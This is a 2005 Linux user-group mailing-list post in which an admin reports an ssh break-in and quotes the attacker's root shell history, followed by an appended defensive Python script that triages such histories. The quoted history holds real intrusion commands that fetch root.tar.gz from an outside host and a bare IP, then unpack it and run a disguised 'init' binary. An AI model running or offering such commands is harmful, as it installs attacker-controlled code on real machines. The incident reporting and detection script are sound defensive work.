[wellylug] Think I've had a server hacked
Mark Signal
mark at databackup.co.nz
Wed Oct 26 10:25:17 NZDT 2005
Hi
I set up a box ages ago for a client - Red Hat 7.2/Mitel with only the ssh port open.
Root password just got changed and /var/log/auth deleted.
Last login from 82.123.175.245 (somewhere in Europe - normally only
connections from Lower Hutt :)
root bash history has..
w
passwd
uname -a
ps x
w
cd /var/tmp
ls
wget hash.idilis.ro/root.tar.gz
wget 217.156.85.3/root.tar.gz
fr hash.idilis.ro
ftp hash.idilis.ro
ftp 217.156.85.3
tar xzvf mech*
cd mech
mv bash init
PATH=:.PATH
init
init
init
I am copying all the data off (including /var/logs/) and will
reinstall/update and shift the ssh port.
Is there anything else I can/should do?
Cheers
Mark
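A triage pass over a root shell history like the one quoted in the post, as an added example that is not part of the original message: it flags downloads made while sitting in a world-writable temp directory, fetches from a bare IP address, a file renamed to a daemon name, a PATH containing an empty or "." entry, and a password change. The sample history is constructed with documentation hosts; the function names and the DAEMON_NAMES list are assumptions.

```python
import re
import shlex

TEMP_DIRS = ("/tmp", "/var/tmp", "/dev/shm")         # world-writable staging spots
FETCHERS = {"wget", "curl", "ftp"}
DAEMON_NAMES = {"init", "sshd", "crond", "syslogd"}  # assumed list, extend as needed
IPV4_HOST = re.compile(r"^(?:\w+://)?\d{1,3}(?:\.\d{1,3}){3}(?:[:/]|$)")

# Constructed sample history (documentation hosts, not real indicators).
SAMPLE = ["w", "passwd", "uname -a", "cd /var/tmp",
          "wget files.example.org/root.tar.gz", "wget 192.0.2.3/root.tar.gz",
          "tar xzvf mech*", "cd mech", "mv bash init", "PATH=:.PATH", "init"]

def in_temp(path):
    return any(path == d or path.startswith(d + "/") for d in TEMP_DIRS)

def triage_history(lines):
    """Return [(line_no, command, [reasons])] for suspicious history entries."""
    findings, cwd = [], "~"
    for no, raw in enumerate(lines, 1):
        try:
            argv = shlex.split(raw)
        except ValueError:               # unbalanced quotes: plain whitespace split
            argv = raw.split()
        if not argv:
            continue
        reasons = []
        if argv[0] == "cd" and len(argv) > 1:   # track the working directory
            cwd = argv[1] if argv[1].startswith("/") else cwd.rstrip("/") + "/" + argv[1]
        elif argv[0] in FETCHERS:
            if in_temp(cwd):
                reasons.append("download while in " + cwd)
            if any(IPV4_HOST.match(a) for a in argv[1:]):
                reasons.append("fetch from bare IP address")
        elif argv[0] == "mv" and len(argv) == 3 and argv[2].rsplit("/", 1)[-1] in DAEMON_NAMES:
            reasons.append("file renamed to daemon name " + argv[2])
        elif argv[0].startswith("PATH=") and {"", "."} & set(argv[0][5:].split(":")):
            reasons.append("empty or '.' entry puts current directory in PATH")
        elif argv[0] == "passwd":
            reasons.append("password change")
        if reasons:
            findings.append((no, raw.strip(), reasons))
    return findings

if __name__ == "__main__":
    for no, cmd, reasons in triage_history(SAMPLE):
        print(f"{no:>3}  {cmd:<40} {'; '.join(reasons)}")
```

A history file on a compromised host can be edited or truncated by whoever had root, so a clean result proves nothing; run this against a copy taken from the imaged disk.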